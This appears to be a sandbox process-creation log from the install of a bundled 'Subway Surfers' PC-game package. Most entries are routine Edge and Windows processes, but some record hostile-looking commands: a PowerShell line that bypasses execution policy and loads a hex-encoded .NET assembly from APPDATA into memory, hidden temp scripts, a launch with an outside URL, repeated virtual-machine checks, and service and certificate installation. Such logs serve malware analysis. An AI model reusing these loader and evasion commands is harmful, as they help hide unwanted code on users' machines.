-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss733D.tmp.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -c "$w="$env:APPDATA"+'/Browser Extension/BE.txt';$h=Get-Content -Path $w -Raw;[byte[]]$bytes=($h -split '(.{2})' -ne '' -replace '^','0X');[Reflection.Assembly]::Load($bytes);[WebCompanion.BrowserExtension.S]::Start()"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss80DD.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7040 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff6e57b5460,0x7ff6e57b5470,0x7ff6e57b5480

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D2C83B05C5CA5351D46C74F688533745

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss708.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8332 /prefetch:1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss2E3F.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1720 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\MSI38F5.tmp

"C:\Users\Admin\AppData\Local\Temp\MSI38F5.tmp" https://ayem2390.com/ext/ruftyp/

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3901.tmp.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ayem2390.com/ext/ruftyp/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7fff17e946f8,0x7fff17e94708,0x7fff17e94718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Installer Assistant\setup_com.kiloo.subwaysurf_flow6mkt_0.exe

"C:\Users\Admin\AppData\Local\Installer Assistant\setup_com.kiloo.subwaysurf_flow6mkt_0.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7044 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe

"C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe" /app "C:\Users\Admin\AppData\Local\MobiGame\\"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6992 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3956 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4572 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\utils\sysinfo-app.exe"

C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\utils\sysinfo-app.exe

C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\utils\sysinfo-app.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6992 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\MobiHelper.exe

"MobiHelper.exe" --install-path="C:\Program Files\MobiGame" --desktop-path="C:\Users\Admin\Desktop" --local-app-data-path="C:\Users\Admin\AppData\Local\MobiGame" --parent="C:\Users\Admin\AppData\Local\Temp\pcgame_8B68C5CF\setup_com.kiloo.subwaysurf_flow6mkt_0.exe" --playstore-json-file-path="C:\Users\Admin\AppData\Local\MobiGame\playstore.json" --google-analytics-id="0" --create-app-shortcut --app-id="com.kiloo.subwaysurf" --app-name="Subway Surfers" --app-icon-url="https://play-lh.googleusercontent.com/RxkRzr__LkRttN1r5Zfh2BMzaG7NKf7iL8yj8f1TKIfwNSuRn29zxGh4b1vbEmsNJjPJ"

C:\Windows\system32\ie4uinit.exe

"C:\Windows\system32\ie4uinit.exe" -show

C:\Windows\system32\ie4uinit.exe

"C:\Windows\system32\ie4uinit.exe" -show

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_OptionalFeature | Where-Object {('HypervisorPlatform','VirtualMachinePlatform','Microsoft-Hyper-V-All','Microsoft-Hyper-V-Hypervisor','Microsoft-Hyper-V-Services') -like $_.Name}).InstallState

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=8348 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3112 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" (Get-CimInstance Win32_ComputerSystem).HypervisorPresent

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 881FB09450E5B681BB59DC1B0EF5C8BA

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI7E19.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240877156 574 WixSharp!WixSharp.ManagedProjectActions.WixSharp_InitRuntime_Action

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI80CA.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240877796 583 WixSharp!WixSharp.ManagedProjectActions.WixSharp_Load_Action

C:\Windows\system32\cmd.exe

"cmd.exe" /c set

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI86F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240879359 604 VirtualBoxSetup!VirtualBoxSetup.CustomActions.SetSessionPropertiesFromConfig

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7076 /prefetch:1

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D6F65FD4A1A3940EF3150FDD1AE7B70E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:1

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 177442438E24C2611F16A5418A7CB8ED E Global\MSI0000

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIDF7B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240902156 655 VirtualBoxSetup!VirtualBoxSetup.CustomActions.CloseProcessesAndUsedFiles

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIE26A.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240902796 662 VirtualBoxSetup!VirtualBoxSetup.CustomActions.DeletePlayStoreAutorun

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7044 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9591283387730107902,14665312588384215788,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,15379572539028092792,3028589347169674040,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4976 /prefetch:2

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI6E40.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240938687 666 VirtualBoxSetup!VirtualBoxSetup.CustomActions.CreatePlaystore

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI744C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240940062 671 VirtualBoxSetup!VirtualBoxSetup.CustomActions.CreateRegistryForAegLauncher

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI76CE.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240940781 675 VirtualBoxSetup!VirtualBoxSetup.CustomActions.InstallCertificate

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI79EC.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240941515 679 VirtualBoxSetup!VirtualBoxSetup.CustomActions.SaveSessionPropertiesToConfig

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI7E71.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240942687 689 VirtualBoxSetup!VirtualBoxSetup.CustomActions.SubstitutePath

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSI849C.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240944234 709 VirtualBoxSetup!VirtualBoxSetup.CustomActions.InstallService

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" "C:\Program Files\MobiGame\MobiGameUpdater.exe"

C:\Windows\system32\sc.exe

"sc.exe" config MobiGameUpdater start= auto

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\MobiGame\utils\subinacl.exe

"C:\Program Files\MobiGame\utils\subinacl.exe" /service MobiGameUpdater /grant=S-1-5-21-177160434-2093019976-369403398-1000=F

C:\Program Files\MobiGame\MobiGameUpdater.exe

"C:\Program Files\MobiGame\MobiGameUpdater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

